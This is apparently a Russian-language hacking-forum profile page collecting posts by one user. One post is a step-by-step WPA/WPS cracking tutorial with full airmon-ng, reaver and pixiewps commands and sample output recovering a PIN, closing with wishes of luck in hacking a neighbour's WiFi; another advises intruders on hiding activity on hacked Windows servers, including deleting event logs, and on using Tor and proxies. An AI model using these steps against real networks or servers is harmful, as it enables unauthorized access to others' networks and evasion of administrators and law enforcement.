
Blmbon
Members-
Публикации
8 -
Зарегистрирован
-
Посещение
Никогда
Репутация
35 Excellent-
23 схемы мобильного мошенничества - ЗеК класс
Blmbon ответил в тему пользователя Sharik в Халява-бесплатня раздача
Не надо удивляться,СИ в тюрьме живет бурно.И думаю вечность жить будет- 3 ответа
-
- 3
-
-
Еще веришь что морковкой сайты ломают?
- 2 ответа
-
- 2
-
-
расширенный режим,глазок- добавляешь цифры через запятую например 10,10,10
- 2 ответа
-
- 5
-
-
Интересная статья вызвало сомнение только вот это Можно по моему разозлить собеседника своей тупостью, т.к. он сказал нет мягко дабы тебе не выказать не уважения, а ты все равно по тем же воротам бьешь как баран
- 3 ответа
-
- 6
-
-
Обзор различных схем обеспечения анонимной работы.
Blmbon ответил в тему пользователя Blmbon в Безопасность и анонимность / Security & anonymity
Не исключено, но я посчитал ненужным указывать данный факт, чтобы не быть голословным: лично мне неизвестны случаи выдачи персональных данных о пользователях сети Tor по «первым» требованиям третьих лиц. Зато факт возможности перехвата передаваемого в сети трафика куда более реален и для кого-то может свести на «нет» использование Тора в качестве средства для проведения аудита. Однако для анонимного серфинга (если пользователь предпочитает скрывать личную информацию) данная сеть может стать отличной альтернативой цепочкам прокси-серверов. -
Может быть я и повторюсь в чем то, но не судите строго, первая статья Хотелось бы получить VIP Статус! но про безопасность можно говорить всегда) Как говорится:" повторение мать ученья"! Введение: зачем это нужно? Компьютеризация населения сделала заметный вклад в повседневную деятельность среднестатистического человека. Для кого-то информационные технологии стали средством получения стабильного дохода, зачастую не совсем законного, а для кого-то и совсем незаконного (простите за каламбур). Цель данного материала состоит не в описании каких-то сложных схем сокрытия факта своей деятельности от налоговой инспекции и не в предоставлении инструкции по исключению встречи с правоохранительными органами. Если читателю есть что скрывать, данный обзор подскажет как лучше организовать процесс сокрытия, в зависимости от ситуации. Схемы, представленные в обзоре, представляют собой некую базу, на основе которой можно строить свои методики. 1. Конфиденциальность при работе с операционной системой. Небольшое отступление: идея написать данный материал возникла из небольшого поста в моем блоге ("Анализ конфиденциальности при работе с гостевой ОС"), поэтому начну с рассмотрения излюбленной многими концепции «виртуальной машины». 1.1 Использование виртуальных машин. Иллюзия изолированности гостевой ОС разрушается при рассмотрении некоторых процессов, протекающих в основной ОС. В клиентских линейках многих операционных систем присутствует режим гибернации. При переходе в данный режим содержимое оперативной памяти отображается на жесткий диск и при стандартных настройках системы остается до следующего перехода. Риск сохранения состояния гостевой ОС на жестком диске довольно высок и не стоит списывать его со счетов. Для ускорения работы ОС существует механизм постраничного сохранения участков оперативной памяти, которые не используются довольно продолжительное время (swap). Далее, при обращении к такому участку он восстанавливается в оперативную память. Соль этого механизма в том, что все эти манипуляции производятся прозрачно для пользователя и последний никак не может повлиять на процесс копирования. Изменение размера файла подкачки снижает, но не устраняет риск попадания данных о состоянии сеанса гостевой ОС на жесткий диск из оперативной памяти. В свою очередь, полное отключение свопа устраняет потенциальный источник «утечки», но снижает скорость работы системы в целом. Тут придется идти на компромисс. + удобность в повседневном использовании + быстрое удаление компрометирующих данных в случае надобности + наличие образов и, как следствие, возможность сокрытия образа компрометирующей гостевой ОС + быстрая развертываемость инфраструктуры - наличие неявных каналов утечки данных из гостевой ОС в основную ОС - снижение производительности (весомый недостаток для многих) - отсутствие автономности образов гостевых ОС от используемого для виртуализации ПО 1.2 Конфиденциальность при работе с LiveCD(DVD/USB)-дистрибутивами. Широко распространена практика использования мобильных носителей с предустановленными системами. Кто-то предпочитает одну единственную систему, предназначенную для установки на flash или CD и содержащую весь необходимый инструментарий для работы в «полевых» условиях, а кто-то отдает предпочтение своей собственной сборке, настраивая все под свои нужды. При работе с данным типом операционных систем наиболее высоким показателем качества, пожалуй, является «быстроразвертываемость» (мобильность). Лучший инструмента для анонимной работы в незнакомых условиях трудно найти, чего не скажешь о повседневном использовании: отсутствие возможности сохранения данных, конфигурационных файлов и т.п. является как отрицательным фактом (в ущерб usability), так и положительным (отсутствие утечки данных в основную память рабочей станции). Манипуляция данными исключительно в оперативной памяти позволяет не беспокоиться о явных каналах утечки данных. + мобильность + возможность работы в «полевых» условиях + работа с данными исключительно в оперативной памяти - неудобство повседневного использования. 1.3 Конфиденциальность при работе с удаленными рабочими станциями (выделенными серверами). Неаккуратное использование удаленных рабочих станций для совершения незаконных действий может раскрыть нарушителя, продемонстрировав его IP-адрес или другую полезную информацию третьим лицам. Рассмотрим возможные каналы утечки данных на примере Windows-серверов, в силу их наибольшей распространенности, которая, в свою очередь, вытекает из большей степени уязвимости. При использовании службы терминалов (она же RDP) и при недостаточных «предосторожностях» есть риск попадания авторизованных действий в системные журналы (в Win NT так называемый event log: C:\WINDOWS\system32\config, все файлы которого скрытые и подлежат удалению с помощью специального ПО, наподобие Unlocker). Если установленные взломщиком программы создают сетевую активность или активно используют ресурсы сервера, бдительный администратор может заметить подозрительную сетевую активность (либо подозрительную новую службу). Есть риск попасть «под колпак», т. е. администратор имеет все возможности снифать порт, на котором висит ПО нарушителя. Отсюда, как результат, утечка конфиденциальной информации. К тому же никто не даст гарантии, что взломанный сервер не входит в сеть honeypot со всеми вытекающими… + выделенные сервера доступны 24/7 + производительность - при недостаточных мероприятиях существует возможность попасть под наблюдение администраторов сервера, со всеми вытекающими последствиями. 2. Анонимность при работе с web-ресурсами. «Независимые исследователи» защищенности web-приложений в своей работе зачастую используют цепочки прокси-серверов и/или анонимную сеть Tor (или ее аналоги, например, I2P). Рассмотрим подробнее каждую из этих схем. 2.1 Использование прокси-серверов. Техническая особенность цепочки прокси-серверов: отображение в логах целевого сайта последнего сервера в цепочке и прозрачный обмен данными между взломщиком и целевым сайтом. Однако как первый, так и второй факт можно оспорить: существует множество методов раскрытия нарушителя, который прячется за прокси-сервером, а также резкое снижение скорости соединения в силу технических особенностей. Думаю, заострять внимание на подобной схеме не имеет смысла, так как на форуме данная тема «истерта» до мелочей. Перейдем к более интересной схеме - анонимной сети Tor. 2.2 Использование анонимной сети Tor. (дан как пример) Распределенная система серверов (нодов), между которыми трафик проходит в зашифрованном виде, знакома любому, кто хоть немного задумывался над собственной анонимностью в Сети. На последней ноде в цепочке (так называемой, exit-ноде) передаваемые данные проходят процедуру расшифровки и передаются целевому серверу в открытом виде. Данный факт позволяет поставить снифер на выходной ноде и просматривать весь проходящий трафик. Звучит просто, но на самом деле все именно так. Подробнее процедура перехвата трафика в сети Tor описана в октябрьском номере журнала «Хакер» (статья «Включаем Tor на всю катушку»). + прохождение трафика в зашифрованном виде по цепочке серверов +постоянная смена цепочки (изменение маршрута следования пакетов) +возможность создания ноды - передача данных с exit-node целевому серверу в открытом виде и, как следствие, возможность перехвата пакетов. 3. … Технологию VPN я нарочно оставил за кадром, ведь обилие ее реализаций и способы использования сильно разнятся, что не позволит охватить все схемы в данном обзоре. Каждый предпочитает свою схему обеспечения конфиденциальности при работе в различных сферах ИТ и поэтому давать универсальные рекомендации я не берусь, а хочу лишь попросить читателей не стесняться и выкладывать описания своих схем для последующего детального анализа и выявления «узких» мест, которые я (и другие участники форума) с удовольствием прокомментируют в данном посте.
- 3 ответа
-
- 5
-
-
Сегодня я хочу рассказать как взломать WiFi WPA/WPA2 (WPS ATTACK) нам нужно будет: Linux (у меня стоит Kali Linux, наиболее удобна так как большинство утилит вшиты) Сетевая карта (PCI или USB не имеет значения, у меня PCI) Утилиты, которые потребуются уже вшиты в ОС. Но тем, у кого обычный линукс надо скачать вот эти утилиты - aircrack, wifite, reaver, pixiewps. Если все готово, то начинаем. Открываем терминал и пишем: airmon-ng - определяем наш беспроводной интерфейс. У каждого своя ситуация, в моем случае wlan0 Далее пишем следующее: airmon-ng start wlan0 - переводим в режим мониторинга. ВНИМАНИЕ название вашего интерфейса может изменится, в моем случае стало wlan0mon. После этого обычно остаются процессы, которые могут помешать их надо удалить используя kill **** (вместо **** id процесса) Теперь необходимо просканировать наше вайфай пространство: airodump-ng wlan0mon Используя утилиту wifite определим одну важную вещь(кстати, используя эту утилиту можно хакнуть вайфай без других утилит, но мне она не подходит): wifite запускается сканирование, выбираем сеть с включенным WPS. Но для того, чтобы все прошло успешно надо что бы в выбранной нами сети был клиент, без подключенного клиента это пустая трата времени. Если что, дожидаемся его появления. Wifite больше не пригодится. Взламывать WPS будем, используя reaver: reaver Далее: reaver -i wlan0mon -b F8:C0:91:14:C7:6B после -b должен быть bssid выбранной вами сети(смотрим в airodump-ng) Reaver начинает взлом, придется подождать пока не появятся E-Hash1 и E-Hash2 Итак, reaver закончил работу, но WPS PIN не появился, а появились данные о роутере все в норме. Тут то нам и нужен pixiewps: pixiewps Далее смотрим пример: pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 59:1f:11:57:8b:52:61:40:63:fe:8d:e3:3d:04:36:a5:74:43:01:c6:a7:4a:06:60:2f:3c:c5:d3:87:7c:c0:d4:7a:d3:6b:09:f7:c5:5c:b5:18:62:13:b6:0c:79:3c:8f:58:97:e7:0c:b7:47:3d:6c:60:21:6c:d3:bc:a7:62:05:80:6b:a7:9c:b2:26:b5:62:37:7b:7c:08:24:93:15:87:bb:ff:ed:3f:6a:33:54:4c:a1:a0:1b:2e:2e:d2:35:e8:5d:72:55:77:57:97:ef:9a:c0:2f:c1:20:cf:de:a9:7b:e2:eb:70:a5:86:4d:03:72:ec:5c:82:d9:a4:70:44:3a:30:3a:63:6a:8d:39:c8:5e:71:1f:66:ab:4d:89:6d:e7:98:36:91:1e:e4:fc:2a:e6:c9:3b:9b:88:80:be:6a:04:d0:7b:43:2b:26:4e:62:4c:ea:01:7d:1e:90:a2:ba:33:29:b3:94:0b:20:02:9f:55:05:d3:68:d2:26:41:9c:2e -s 99:98:3e:42:0c:88:55:58:e2:97:cc:86:db:2a:ba:89:d9:6b:55:d9:7b:9a:1b:c3:93:a9:c8:70:35:4c:0a:7b -z f4:d3:c8:f0:64:24:e5:da:a9:97:16:4b:58:3d:41:15:76:15:5b:01:9e:1e:77:81:ab:55:6d:7e:82:8d:71:d8 -a 95:c5:07:7a:ef:d1:f9:d7:6d:6d:44:6d:57:c5:d9:59:c6:60:4d:bf:de:34:cc:8f:94:d8:b8:e1:74:0f:0b:18 -n 02:cc:48:b6:5c:b4:1f:2d:54:b2:27:67:3d:29:70:8f Что получилось в итоге: Pixiewps 1.1 [*] E-S1: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [*] E-S2: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [+] WPS pin: 99956042 [*] Time taken: 1 s Итак, мы получили WPS PIN используя который можем подключится к взломаной сетке. Чтобы подключиься вводим WPS PIN вместо пароля. Ну вроде все!)Удачи взломать соседкий Wi Fi,но не забывайте это уголовно наказуемо!
-
Бойтесь провайдера
Blmbon ответил в тему пользователя Firo в Безопасность и анонимность / Security & anonymity
Да не будут хранить логи у всех,ведь нужно такие огромнные сервера,там тонны тарабайтов,максимум,если конкретно надо убдет проследить за определным человеком,тогда они поставят ловилку- 1 ответ
-
- 7
-